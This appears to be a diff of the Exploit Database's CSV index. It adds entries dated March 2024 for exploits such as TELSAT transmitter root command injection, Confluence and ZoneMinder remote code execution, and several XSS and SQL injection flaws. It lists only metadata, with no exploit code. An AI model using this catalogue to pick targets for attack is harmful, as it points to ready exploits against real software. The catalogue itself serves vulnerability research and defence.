 6750,exploits/hardware/remote/6750.txt,"Telecom Italia Alice Pirelli routers - Backdoor from internal LAN/WAN",2008-10-14,"saxdax & drpepperONE",remote,hardware,,2008-10-13,,1,OSVDB-49193,,,,,
 50948,exploits/hardware/remote/50948.py,"Telesquare SDT-CW3B1 1.1.0 - OS Command Injection",2022-06-03,"Bryan Leong",remote,hardware,,2022-06-03,2022-06-03,0,CVE-2021-46422,,,,,
 21513,exploits/hardware/remote/21513.c,"Telindus 1100 Series Router - Administration Password Leak",2002-06-05,rubik,remote,hardware,,2002-06-05,2012-09-24,1,CVE-2002-0949;OSVDB-4766,,,,,https://www.securityfocus.com/bid/4946/info
+51907,exploits/hardware/remote/51907.txt,"TELSAT marKoni FM Transmitter 1.9.5 - Backdoor Account Information Disclosure",2024-03-18,LiquidWorm,remote,hardware,,2024-03-18,2024-03-18,0,,,,,,
+51908,exploits/hardware/remote/51908.txt,"TELSAT marKoni FM Transmitter 1.9.5 - Insecure Access Control Change Password",2024-03-18,LiquidWorm,remote,hardware,,2024-03-18,2024-03-18,0,,,,,,
+51906,exploits/hardware/remote/51906.py,"TELSAT marKoni FM Transmitter 1.9.5 - Root Command Injection",2024-03-18,LiquidWorm,remote,hardware,,2024-03-18,2024-03-18,0,,,,,,
 51827,exploits/hardware/remote/51827.txt,"TEM Opera Plus FM Family Transmitter 35.45 - Remote Code Execution",2024-02-27,LiquidWorm,remote,hardware,,2024-02-27,2024-02-27,0,,,,,,
 51828,exploits/hardware/remote/51828.txt,"TEM Opera Plus FM Family Transmitter 35.45 - XSRF",2024-02-27,LiquidWorm,remote,hardware,,2024-02-27,2024-02-27,0,,,,,,
 44253,exploits/hardware/remote/44253.py,"Tenda AC15 Router - Remote Code Execution",2018-02-14,"Tim Carrington",remote,hardware,,2018-03-06,2018-03-06,0,CVE-2018-5767,,,http://www.exploit-db.com/screenshots/idlt44500/rootshell.png,,https://www.fidusinfosec.com/remote-code-execution-cve-2018-5767/
@@ -11689,6 +11692,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 24915,exploits/multiple/webapps/24915.txt,"Aspen 0.8 - Directory Traversal",2013-04-02,"Daniel Ricardo dos Santos",webapps,multiple,,2013-04-02,2013-04-02,1,CVE-2013-2619;OSVDB-91895,,,http://www.exploit-db.com/screenshots/idlt25000/screen-shot-2013-04-02-at-93955-am.png,http://www.exploit-db.comaspen-0.8.tgz,
 12133,exploits/multiple/webapps/12133.txt,"Asset Manager 1.0 - Arbitrary File Upload",2010-04-09,"Shichemt Alen & NeT_Own3r",webapps,multiple,,2010-04-08,,0,,,,,,
 37791,exploits/multiple/webapps/37791.txt,"Atlassian Confluence 3.4.x - Error Page Cross-Site Scripting",2012-09-12,"D. Niedermaier",webapps,multiple,,2012-09-12,2015-08-16,1,OSVDB-126486,,,,,https://www.securityfocus.com/bid/55509/info
+51904,exploits/multiple/webapps/51904.py,"Atlassian Confluence < 8.5.3 - Remote Code Execution",2024-03-18,MaanVader,webapps,multiple,,2024-03-18,2024-03-18,0,,,,,,
 51829,exploits/multiple/webapps/51829.rb,"Atlassian Confluence Data Center and Server - Authentication Bypass (Metasploit)",2024-02-27,"Emir Polat",webapps,multiple,,2024-02-27,2024-02-27,0,,,,,,
 49465,exploits/multiple/webapps/49465.py,"Atlassian Confluence Widget Connector Macro - SSTI",2021-01-22,46o60,webapps,multiple,,2021-01-22,2021-01-22,0,CVE-2019-3396,,,,,
 49633,exploits/multiple/webapps/49633.py,"Atlassian JIRA 8.11.1 - User Enumeration",2021-03-10,"Dolev Farhi",webapps,multiple,,2021-03-10,2021-03-10,0,CVE-2020-14181,,,,,
@@ -14555,6 +14559,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 1825,exploits/php/webapps/1825.txt,"Back-End CMS 0.7.2.2 - 'BE_config.php' Remote File Inclusion",2006-05-25,Kacper,webapps,php,,2006-05-24,,1,OSVDB-25828;CVE-2006-2682,,,,,
 34828,exploits/php/webapps/34828.txt,"Backbone Technology Expression 18.9.2010 - Cross-Site Scripting",2010-10-06,"High-Tech Bridge SA",webapps,php,,2010-10-06,2014-09-30,1,,,,,,https://www.securityfocus.com/bid/43910/info
 50323,exploits/php/webapps/50323.html,"Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF)",2021-09-23,V1n1v131r4,webapps,php,,2021-09-23,2021-09-23,0,,,,,http://www.exploit-db.combackdrop.zip,
+51905,exploits/php/webapps/51905.txt,"Backdrop CMS 1.23.0 - Stored XSS",2024-03-18,"Sinem Şahin",webapps,php,,2024-03-18,2024-03-18,0,,,,,,
 51597,exploits/php/webapps/51597.txt,"Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS)",2023-07-19,"Mirabbas Ağalarov",webapps,php,,2023-07-19,2023-07-19,0,,,,,,
 5546,exploits/php/webapps/5546.txt,"BackLinkSpider 1.1 - 'cat_id' SQL Injection",2008-05-05,K-159,webapps,php,,2008-05-04,2016-11-25,1,OSVDB-45001;CVE-2008-2096,,,,,http://advisories.echo.or.id/adv/adv95-K-159-2008.txt
 34045,exploits/php/webapps/34045.txt,"BackLinkSpider 1.3.1774 - 'cat_id' SQL Injection",2010-05-27,"sniper ip",webapps,php,,2010-05-27,2014-07-13,1,,,,,,https://www.securityfocus.com/bid/40398/info
@@ -19206,6 +19211,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 4404,exploits/php/webapps/4404.txt,"GForge < 4.6b2 - 'skill_delete' SQL Injection",2007-09-13,"Sumit Siddharth",webapps,php,,2007-09-12,2016-12-26,1,OSVDB-37031;CVE-2007-4966;CVE-2007-3913,,,,,
 3271,exploits/php/webapps/3271.php,"GGCMS 1.1.0 RC1 - Remote Code Execution",2007-02-05,Kacper,webapps,php,,2007-02-04,,1,OSVDB-35849;CVE-2007-0804,,,,,
 26653,exploits/php/webapps/26653.txt,"GhostScripter Amazon Shop 5.0 - 'search.php' SQL Injection",2005-11-29,r0t,webapps,php,,2005-11-29,2013-07-07,1,CVE-2005-3908;OSVDB-21371,,,,,https://www.securityfocus.com/bid/15634/info
+51903,exploits/php/webapps/51903.py,"Gibbon LMS < v26.0.00 - Authenticated RCE",2024-03-18,"Ali Maharramli_Fikrat  Guliev_Islam Rzayev",webapps,php,,2024-03-18,2024-03-18,0,,,,,,
 42442,exploits/php/webapps/42442.txt,"GIF Collection 2.0 - SQL Injection",2017-08-10,"Ihsan Sencan",webapps,php,,2017-08-10,2017-08-10,0,,,,,,
 44718,exploits/php/webapps/44718.txt,"Gigs 2.0 - 'username' SQL Injection",2018-05-23,AkkuS,webapps,php,,2018-05-23,2018-05-23,0,,,,,,
 47185,exploits/php/webapps/47185.txt,"GigToDo 1.3 - Cross-Site Scripting",2019-07-29,m0ze,webapps,php,80,2019-07-29,2019-07-29,0,,"Cross-Site Scripting (XSS)",,,,
@@ -28625,6 +28631,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 32767,exploits/php/webapps/32767.txt,"Quick.CMS 5.4 - Multiple Vulnerabilities",2014-04-09,"Shpend Kurtishaj",webapps,php,,2014-04-09,2014-04-09,1,OSVDB-105678;OSVDB-105677,,,,,
 50530,exploits/php/webapps/50530.txt,"Quick.CMS 6.7 - Cross Site Request Forgery (CSRF) to Cross Site Scripting (XSS) (Authenticated)",2021-11-17,"Rahad Chowdhury",webapps,php,,2021-11-17,2021-11-17,0,,,,,http://www.exploit-db.comQuick.Cms_v6.7-en.zip,
 49494,exploits/php/webapps/49494.py,"Quick.CMS 6.7 - Remote Code Execution (Authenticated)",2021-01-29,mari0x00,webapps,php,,2021-01-29,2021-01-29,0,CVE-2020-35754,,,,,
+51910,exploits/php/webapps/51910.txt,"Quick.CMS 6.7 - SQL Injection Login Bypass",2024-03-18,H4X.Forensics,webapps,php,,2024-03-18,2024-03-18,0,,,,,,
 2719,exploits/php/webapps/2719.php,"Quick.CMS.Lite 0.3 - Cookie sLanguage Local File Inclusion",2006-11-05,Kacper,webapps,php,,2006-11-04,,1,OSVDB-30243;CVE-2006-5834,,,,,
 8505,exploits/php/webapps/8505.txt,"Quick.CMS.Lite 0.5 - 'id' SQL Injection",2009-04-21,Player,webapps,php,,2009-04-20,,1,OSVDB-54123;CVE-2009-1410,,,,,
 43868,exploits/php/webapps/43868.txt,"Quickad 4.0 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php,,2018-01-23,2018-01-23,0,CVE-2018-5972,,,,,
@@ -31276,6 +31283,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 9390,exploits/php/webapps/9390.txt,"Typing Pal 1.0 - 'idTableProduit' SQL Injection",2009-08-07,Red-D3v1L,webapps,php,,2009-08-06,,1,OSVDB-64564;CVE-2009-4860,,,,,
 15856,exploits/php/webapps/15856.php,"TYPO3 - Arbitrary File Retrieval",2010-12-29,ikki,webapps,php,,2010-12-29,2010-12-29,0,CVE-2012-2344;OSVDB-70121;CVE-2010-5099;CVE-2010-3714;OSVDB-68590,,,,http://www.exploit-db.comintroductionpackage-4.4.3.zip,
 17905,exploits/php/webapps/17905.txt,"Typo3 - File Disclosure",2011-09-29,"Number 7",webapps,php,,2011-09-29,2011-09-30,1,OSVDB-83880,,,,,
+51901,exploits/php/webapps/51901.txt,"TYPO3 11.5.24 - Path Traversal (Authenticated)",2024-03-18,"Saeed reza Zamanian",webapps,php,,2024-03-18,2024-03-18,0,,,,,,
 22297,exploits/php/webapps/22297.pl,"Typo3 3.5 b5 - 'showpic.php' File Enumeration",2003-02-28,"Martin Eiszner",webapps,php,,2003-02-28,2012-10-28,1,,,,,,https://www.securityfocus.com/bid/6982/info
 22298,exploits/php/webapps/22298.txt,"Typo3 3.5 b5 - 'Translations.php' Remote File Inclusion",2003-02-28,"Martin Eiszner",webapps,php,,2003-02-28,2012-10-28,1,,,,,,https://www.securityfocus.com/bid/6984/info
 22315,exploits/php/webapps/22315.pl,"Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure (1)",2003-02-28,"Martin Eiszner",webapps,php,,2003-02-28,2019-03-28,1,,,,,,https://www.securityfocus.com/bid/6993/info
@@ -32341,6 +32349,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 19574,exploits/php/webapps/19574.txt,"Webify Link Directory - SQL Injection",2012-07-04,"Daniel Godoy",webapps,php,,2012-07-04,2012-07-04,1,OSVDB-83688,,,,http://www.exploit-db.comWebifyLinkDirectory.zip,
 21271,exploits/php/webapps/21271.txt,"Webify Photo Gallery - Arbitrary File Deletion",2012-09-12,JIKO,webapps,php,,2012-09-12,2012-09-12,1,OSVDB-85662,,,,,
 51807,exploits/php/webapps/51807.txt,"WEBIGniter v28.7.23 - Stored Cross Site Scripting (XSS)",2024-02-21,"Sagar Banwa",webapps,php,,2024-02-21,2024-02-21,0,,,,,,
+51900,exploits/php/webapps/51900.txt,"WEBIGniter v28.7.23 - Stored XSS",2024-03-18,"Mesut Cetin",webapps,php,,2024-03-18,2024-03-18,0,,,,,,
 51736,exploits/php/webapps/51736.txt,"WEBIGniter v28.7.23 File Upload - Remote Code Execution",2023-10-09,nu11secur1ty,webapps,php,,2023-10-09,2023-10-09,0,,,,,,
 51616,exploits/php/webapps/51616.txt,"Webile v1.0.1 - Multiple Cross Site Scripting",2023-07-20,Vulnerability-Lab,webapps,php,,2023-07-20,2023-07-20,0,,,,,,
 47199,exploits/php/webapps/47199.txt,"WebIncorp ERP - SQL injection",2019-08-01,n1x_,webapps,php,80,2019-08-01,2019-08-02,0,,"SQL Injection (SQLi)",,,,
@@ -32759,6 +32768,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 41497,exploits/php/webapps/41497.php,"WordPress Core < 4.7.1 - Username Enumeration",2017-03-03,Dctor,webapps,php,,2017-03-03,2017-05-04,0,CVE-2017-5487,,,,http://www.exploit-db.comwordpress-4.7.1.zip,
 44949,exploits/php/webapps/44949.txt,"WordPress Core < 4.9.6 - (Authenticated) Arbitrary File Deletion",2018-06-27,VulnSpy,webapps,php,,2018-06-27,2018-07-27,0,,,,,,http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/
 49327,exploits/php/webapps/49327.js,"Wordpress Epsilon Framework Multiple Themes - Unauthenticated Function Injection",2020-12-23,gx1,webapps,php,,2020-12-23,2020-12-23,0,,,,,,
+51899,exploits/php/webapps/51899.txt,"WordPress File Upload Plugin < 4.23.3 - Stored XSS",2024-03-18,"Faiyaz Ahmad",webapps,php,,2024-03-18,2024-03-18,0,,,,,,
 10090,exploits/php/webapps/10090.txt,"WordPress MU 1.2.2 < 1.3.1 - '/wp-includes/wpmu-functions.php' Cross-Site Scripting",2009-11-10,"Juan Galiana Lara",webapps,php,,2009-11-09,,1,,,,,,
 32444,exploits/php/webapps/32444.txt,"WordPress MU 1.2/1.3 - '/wp-admin/wpmu-blogs.php' Multiple Cross-Site Scripting Vulnerabilities",2008-09-29,"Juan Galiana Lara",webapps,php,,2008-09-29,2014-03-23,1,CVE-2008-4671;OSVDB-48635,,,,,https://www.securityfocus.com/bid/31482/info
 5066,exploits/php/webapps/5066.php,"WordPress MU < 1.3.2 - 'active_plugins' Code Execution",2008-02-05,"Alexander Concha",webapps,php,,2008-02-04,,1,OSVDB-41134;CVE-2008-5695,"WordPress Plugin",,,,http://www.buayacorp.com/files/wordpress/wordpress-mu-options-overwrite.html
@@ -34178,6 +34188,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 38938,exploits/php/webapps/38938.txt,"xBoard 5.0/5.5/6.0 - 'view.php' Local File Inclusion",2013-12-24,"TUNISIAN CYBER",webapps,php,,2013-12-24,2016-10-24,1,OSVDB-101526,,,,,https://www.securityfocus.com/bid/64619/info
 1655,exploits/php/webapps/1655.php,"XBrite Members 1.1 - 'id' SQL Injection",2006-04-09,snatcher,webapps,php,,2006-04-08,,1,OSVDB-24467;CVE-2006-1694,,,,,
 11718,exploits/php/webapps/11718.txt,"Xbtit 2.0.0 - SQL Injection",2010-03-13,Ctacok,webapps,php,,2010-03-12,,1,OSVDB-62922,,,,,
+51909,exploits/php/webapps/51909.txt,"xbtitFM 4.1.18 - Multiple Vulnerabilities",2024-03-18,h5kj23kj32io2kj,webapps,php,,2024-03-18,2024-03-18,0,,,,,,
 12140,exploits/php/webapps/12140.php,"xBtiTracker - SQL Injection",2010-04-11,InATeam,webapps,php,,2010-04-10,,1,OSVDB-63650,,,,,
 37708,exploits/php/webapps/37708.txt,"Xceedium Xsuite - Multiple Vulnerabilities",2015-07-27,modzero,webapps,php,,2015-07-27,2015-07-27,0,CVE-2015-4669;CVE-2015-4668;CVE-2015-4667;CVE-2015-4666;CVE-2015-4665;CVE-2015-4664;OSVDB-125159;OSVDB-125158;OSVDB-125157;OSVDB-125156;OSVDB-125155;OSVDB-125154;OSVDB-125153,,,,,http://www.modzero.ch/advisories/MZ-15-02-Xceedium-Xsuite.txt
 5991,exploits/php/webapps/5991.txt,"XchangeBoard 1.70 - 'boardID' SQL Injection",2008-07-02,haZl0oh,webapps,php,,2008-07-01,2016-12-13,1,OSVDB-46670;CVE-2008-3035,,,,,
@@ -34760,6 +34771,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 41239,exploits/php/webapps/41239.txt,"Zoneminder 1.29/1.30 - Cross-Site Scripting / SQL Injection / Session Fixation / Cross-Site Request Forgery",2017-02-03,"Tim Herres",webapps,php,80,2017-02-03,2017-02-03,0,,,,,http://www.exploit-db.comZoneMinder-1.30.0.tar.gz,https://www.foxmole.com/advisories/foxmole-2016-07-05.txt
 47060,exploits/php/webapps/47060.txt,"ZoneMinder 1.32.3 - Cross-Site Scripting",2019-07-01,"Joey Lane",webapps,php,,2019-07-01,2019-07-03,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comzoneminder-1.32.3.tar.gz,
 51071,exploits/php/webapps/51071.py,"Zoneminder < v1.37.24 - Log Injection & Stored XSS & CSRF Bypass",2023-03-27,"Trenches of IT",webapps,php,,2023-03-27,2023-06-19,1,CVE-2022-39291;CVE-2022-39290;CVE-2022-39285,,,,,
+51902,exploits/php/webapps/51902.py,"ZoneMinder Snapshots < 1.37.33 - Unauthenticated RCE",2024-03-18,"Ravindu Wickramasinghe",webapps,php,,2024-03-18,2024-03-18,0,,,,,,
 2142,exploits/php/webapps/2142.txt,"ZoneX 1.0.3 - Publishers Gold Edition Remote File Inclusion",2006-08-07,"Mehmet Ince",webapps,php,,2006-08-06,,1,OSVDB-27775;CVE-2006-4036,,,,,
 29091,exploits/php/webapps/29091.txt,"ZonPHP 2.25 - Remote Code Execution",2013-10-20,"Halim Cruzito",webapps,php,,2013-10-23,2013-10-23,1,CVE-2011-4275;CVE-2009-4140;OSVDB-59051,,,,http://www.exploit-db.comzonPHPv225.zip,
 49501,exploits/php/webapps/49501.txt,"Zoo Management System 1.0 - 'anid' SQL Injection",2021-02-01,"Zeyad Azima",webapps,php,,2021-02-01,2021-02-01,0,,,,,,